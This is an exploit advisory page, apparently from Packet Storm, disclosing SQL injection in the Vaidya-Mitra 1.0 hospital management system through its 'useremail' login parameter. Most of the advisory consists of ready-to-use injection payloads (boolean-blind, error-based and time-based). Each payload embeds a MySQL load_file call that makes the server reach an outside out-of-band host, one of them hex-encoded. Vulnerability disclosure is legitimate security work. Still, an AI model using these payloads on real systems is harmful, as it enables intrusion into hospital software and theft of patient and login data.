what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Vaidya-Mitra 1.0 SQL Injection

Vaidya-Mitra 1.0 SQL Injection
Posted Jul 13, 2023
Authored by nu11secur1ty

Vaidya-Mitra version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | d1bb8d0b88a7cb0ec1b4eb06d18e4406844f4952496160e85e2fce0c91237440

Vaidya-Mitra 1.0 SQL Injection

Change Mirror Download
## Title: Vaidya-Mitra 1.0 Multiple - SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free:
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `useremail` parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'
was submitted in the useremail parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker easily can steal all information from this
system, like
login credentials, phone numbers and etc.

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: useremail (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
RLIKE (SELECT (CASE WHEN (5532=5532) THEN
0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select
load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''
ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT
(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'gHln'='gHln&userpassword=rootadmin

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND
'ZWBa'='ZWBa&userpassword=rootadmin
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)

## Time spend:
00:27:00


Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close